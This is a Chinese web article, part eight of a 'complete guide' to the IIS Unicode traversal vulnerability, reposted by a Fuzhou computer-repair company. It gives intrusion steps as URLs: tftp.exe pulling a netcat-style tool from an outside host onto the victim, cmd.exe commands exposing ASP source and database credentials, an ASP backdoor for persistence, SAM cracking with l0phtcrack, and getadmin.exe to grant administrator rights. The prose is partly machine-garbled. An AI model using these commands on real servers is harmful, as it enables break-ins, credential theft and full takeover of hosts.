设为主页 | 加入收藏 | 繁體中文

UNICODE漏洞全攻略八

  六、unicode编码漏洞进步篇(续)
  4、TFTP运用
  关于TFTP的运用我们在全攻略-5内里的东西介绍中介绍过,那东西可以在WIN9X
  大概NT、WIN2K下实行,条件条件是需要你在本机上安置PERL服务器程序,这对
  于一般的喜好者来说稍微有点困难。
  实际上要是你是使用NT体系大概你拥有一台NT肉机的话,就可以使用WINNT\SYSTEM32
  下的TFTP.EXE这个软件了。
  tftp/?
  Transfers files to and from a remote computer running the TFTP service.
  TFTP [-i] host [GET | PUT] source [destination]
  -i Specifies binary image transfer mode (also called
  octet). In binary image mode the file is moved
  literally, byte by byte. Use this mode when
  transferring binary files.
  host Specifies the local or remote host.
  GET Transfers the file destination on the remote host to
  the file source on the local host.
  PUT Transfers the file source on the local host to
  the file destination on the remote host.
  source Specifies the file to transfer.
  destination Specifies where to transfer the file.
  资助是英文的,本身翻译吧。
  在UNICODE上的下令代码:
  http://x.x.x.x/scripts/tftp.exe?-i+127.0.0.1+get+ncx99.exe
  你放什么软件都可以,我不喜好木马,以是我也不再介绍你该传什么木马上去,然后
  怎样启动,那样走题太远了。
  5、ASP相干题目
  一般情况下,NT呆板绝大多数都市使用到ASP写的WEB程序和SQL数据库。
  大家都知道ASP代码的泄露意味着你辛费力苦写的ASP源码被人无偿得到,同时你的站点
  也很容易遭到黑手。ASP代码泄露的漏洞许多种,同样,在UNICODE编码漏洞下,你的ASP
  源码同样可以极易被人获取。
  假定你的index.asp是一个很好的程序,那么,入侵者可以经过type下令查看你的文件。
  ../cmd.exe?/type c:\inetpub\wwwroot\index.asp
  大概经过copy下令
  ../cmd.exe?/copy c:\inetpub\wwwroot\index.asp c:\inetpub\wwwroot\index.txt
  然后间接下载你的源码,通太过析,找到你的数据库文件。
  要是你是使用SQL服务来做数据库的,同样,入侵者可以经过查看你的ASP和global.asa
  源码,通太过析,找到你的用户名和密码,然后经过SQL远程办理客户端举行攻击。
  那么,你的商业机密和网站的资料,另有什么安全可言呢?
  入侵者还可以在你的主机里上传一个ASP后门程序(ASE,应该听说过和用过吧)并隐藏
  起来,纵然你以后补失了UNICODE漏洞,入侵仍可在他的ASP后门程序在你未发现之前,
  查看、修改、删除你主机上的WEB文件。
  6、得到超等用户权限
  可以经过下在你的SAM文件,利用一些黑客软件(如l0phtcrack)暴力破解。
  也可以利用后面介绍的上传方法把gasys.dll、cmd.exe和getadmin.exe到目的主机,
  然后经过一些软件大概方法得到目的主机的计算机名,再利用getadmin.exe把
  iuser_计算机 晋级为Administrator
  /scripts/getadmin.exe?IUSR_计算机名
  那另有什么事不行以做呢?曾经即是完全控制这台主机了。
 


    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码: